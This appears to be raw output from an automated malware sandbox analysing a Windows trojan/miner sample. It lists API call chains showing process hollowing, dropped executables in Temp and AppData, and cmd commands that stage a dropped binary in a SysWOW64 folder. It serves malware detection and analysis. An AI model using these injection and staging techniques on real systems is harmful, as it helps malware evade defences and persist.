                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00633253
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_006331FF
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00670640
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00670C40
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00670A50
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006714D0
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0042B010
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0042A230
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00424D00
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D96F0
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D0470
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D0462
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FEA430
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FEAD57
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE53F0
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE90D3
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE08B0
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE2CB8
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_02FE1528
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9ro85QVN0F.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D54.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53A8.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53DC.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: E6C4.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F4CF.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: iscgwer.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: bzxmernq.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeSection loaded: mscorjit.dll
                      Source: 9ro85QVN0F.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\jdijwvkg\
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: String function: 00422C80 appears 133 times
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: String function: 0041E400 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: String function: 0041E1D0 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_056FF5C0 NtUnmapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_056FF6A0 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: FE11.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 433C.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 411E.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 27E3.exe.11.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 7480.exe.11.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 14F6.exe.11.drStatic PE information: Section: .rsrc ZLIB complexity 0.997729445507
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 27E3.exe.11.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 53A8.exe.11.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 656C.exe.11.drStatic PE information: Section: .rsrc ZLIB complexity 0.997721976577
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 7480.exe.11.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 9ro85QVN0F.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@41/30@88/11
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: 9ro85QVN0F.exeVirustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeProcess created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
                      Source: C:\Users\user\AppData\Roaming\iscgwerProcess created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\411E.exe C:\Users\user\AppData\Local\Temp\411E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeProcess created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E6C4.exe C:\Users\user\AppData\Local\Temp\E6C4.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4CF.exe C:\Users\user\AppData\Local\Temp\F4CF.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wuapihost.exe C:\Windows\System32\wuapihost.exe -Embedding
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeProcess created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\411E.exe C:\Users\user\AppData\Local\Temp\411E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E6C4.exe C:\Users\user\AppData\Local\Temp\E6C4.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4CF.exe C:\Users\user\AppData\Local\Temp\F4CF.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
                      Source: C:\Users\user\AppData\Roaming\iscgwerProcess created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeProcess created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\411E.tmpJump to behavior
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00419D0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5320:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4256
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: 0.0
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: wapejan
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: wovag
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: cbH
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: Piruvora
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: gukafipa
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: Pusazide
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCommand line argument: cbH
                      Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
